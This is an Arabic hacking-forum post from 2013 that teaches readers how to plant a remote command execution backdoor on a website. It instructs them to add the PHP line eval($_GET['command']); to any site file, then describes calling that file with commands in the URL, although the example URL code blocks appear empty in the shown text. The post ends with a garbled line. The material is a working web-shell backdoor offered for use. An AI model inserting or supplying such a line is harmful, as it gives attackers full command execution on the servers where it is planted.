عرض مشاركة واحدة
قديم منذ /11-16-2013, 02:49 AM   #1
box
Creator

الصورة الرمزية box

box غير متواجد حالياً

 رقم العضوية : 8302
 تاريخ التسجيل : Nov 2013
 العمر : 35
 الجنس : ~ ذكر
 البلد : مكة المكرمة
 المشاركات : 66
 إهتمامك : الاختراق الروت
 النقاط : 20
 قوة التقييم : box is on a distinguished road

شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة
Cool زرع ثغره Remote Command Execution بطريقه سهله

command, ثغره, execution, بطريقه, سهله, remote

بسم الله الرحمن الرحيم



السلام عليكم ورحمه الله وبركاته

تعريف الثغره للي ما يعرفها
الثغره تسمح لك بتنفيذ أوامر مباشره على السيرفر عن بعد !

أفتح أي ملف بالموقع وأضيف هذا السطر

كود PHP:
eval($_GET['command']);

الاستغلال :
كود PHP:



وإذا ما نفع جرب :
كود PHP:

وإذا ما نفع جرب :
كود PHP:



واستبدل XX بألامر اللي تبغى تنفذه .. والنتيجه راح تظهر بالمتصفح ::
وطبعاً استبدل site.com بدومين الموقع وfile.php بإسم الملف اللي وضعت فيه السطر ::



.vu eyvi Remote Command Execution f'vdri sigi command execution remote






  رد مع اقتباس
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47